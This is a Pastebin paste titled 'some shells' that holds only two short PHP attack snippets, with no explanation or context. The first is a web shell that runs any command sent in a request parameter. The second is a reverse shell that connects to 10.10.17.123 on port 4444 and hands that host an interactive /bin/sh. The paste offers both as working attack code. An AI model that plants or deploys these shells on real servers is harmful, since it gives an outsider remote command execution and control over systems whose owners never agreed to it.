Advertisement
shadiff

some shells

Mar 12th, 2024
20
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.12 KB | None | 0 0
  1. <?php system($_REQUEST['musyoki']); ?>
  2. <?php
  3. $sock=fsockopen("10.10.17.123",4444);
  4. exec("/bin/sh -i <&3 >&3 2>&3");
  5. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement